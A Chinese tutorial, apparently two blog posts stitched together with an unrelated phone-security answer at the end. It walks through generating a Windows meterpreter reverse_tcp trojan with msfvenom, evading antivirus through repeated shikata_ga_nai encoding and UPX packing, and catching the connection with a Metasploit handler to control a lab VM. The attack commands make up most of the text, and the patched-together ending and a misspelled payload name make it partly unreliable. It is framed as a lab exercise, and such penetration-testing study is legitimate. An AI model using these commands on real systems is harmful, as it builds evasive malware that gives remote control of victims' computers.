msfvenom生成木马的简单利用

Posted 2023-04-02 谈一场梦

msfvenom生成木马的简单利用

1、简介

本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件，用kali监听，靶机win10运行木马程序，实现控制靶机win10。

2、实验环境

1、一台kali虚拟机 ip为192.168.101.5
2、一台win10虚拟机

3、实验步骤

1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.101.5 lport=4444 -f exe >shell.exe
2、把刚刚生成的exe木马文件传输到我们的win10靶机上
3、在kali上输入msfconsole打开metasploit
4、metasploit配置及监听


监听好后我们就可以用win10靶机点击我们的木马程序，此处木马程序多次被防火墙拦截

如何用msfvenom生成木马程序

一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.
二,工具:MSF
三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
四,过程:
1,查看帮助
命令: root# msfvenom -h
结果:

2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o
结果:

3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
注:如果只是用msfpayload生成,简单示例:
命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X > Desktop/abc.exe
多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acn.exe
upx加壳：upx -5 /root/Desktop/acn.exe
结果:

说明: -p payload
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
LHOST,LPORT 监听上线的主机IP和端口
-f exe 生成EXE格式
4,把生成的abc.exe放到win7下.执行.
5,在命令行下,打开msfconsole.
命令: root # msfconsole
6,本机监听,因为之前用的是reverse_tcp,所以设置如下
命令: msf > use exploit/multi/handler
Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp
结果:

7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.

8,.验证 参考技术A

下载软件请到正规软件官网下载，也可以到各大应用商店中下载软件，请勿到陌生网址进行下载。若手机中存在木马或者病毒程序，请尝试按照以下步骤进行清除：

安装一款安全软件（例如：手机管家等）。以手机管家为例，打开手机管家，点击主界面上的一键体检即可自动检测手机中存在的病毒，点击一键清除即可删除。

若是无法开机或无法进行解决请尝试到手机品牌官网下载刷机包和工具对手机进行完整恢复，若无法自行处理请送到手机品牌官方售后进行维修。

官方服务
官方网站